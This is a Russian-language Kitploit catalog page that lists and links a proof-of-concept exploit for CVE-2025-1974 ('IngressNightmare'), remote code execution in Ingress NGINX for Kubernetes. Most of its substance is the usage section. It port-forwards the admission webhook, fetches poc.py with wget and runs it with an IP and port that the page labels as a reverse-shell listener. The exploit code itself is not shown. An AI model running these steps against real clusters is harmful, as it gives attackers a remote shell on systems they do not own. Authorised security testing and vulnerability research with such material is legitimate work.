Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1974-poc — PoC для CVE-2025-1974, модифицированный из первого в мире PoC~ | Kitploit
Инструменты/GitHubGitHub/hi-unc1e/cve-2025-1974-poc
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность облачных сред
GitHubhi-unc1e/cve-2025-1974-poc

CVE-2025-1974-poc

PoC для CVE-2025-1974, модифицированный из первого в мире PoC~

Репозиторий
411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC для IngressNightmare, RCE в Ingress NGINX (CVE-2025-1974)

Разработано на основе:

  • https://github.com/zwxxb/CVE-2025-1974/blob/main/poc.py
  • https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities#how-did-we-discover-ingressnightmare-24

Спасибо

Инструкция по использованию

root@kitploit:~
# forward the admission webhook
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 9443:443 &


# python3 -m pip install -r requirements.txt
python3 -m pip install httpx asyncio
wget -c https://github.com/hi-unc1e/CVE-2025-1974-poc/raw/refs/heads/master/poc.py
python3 poc.py --local --ip 192.168.49.1 --port 4444  --admission-port 9443

Описание параметров:

  • ip, port — для обратного шелла
  • admission-port — по умолчанию 8443

Результат выполнения:

image

Скачать инструмент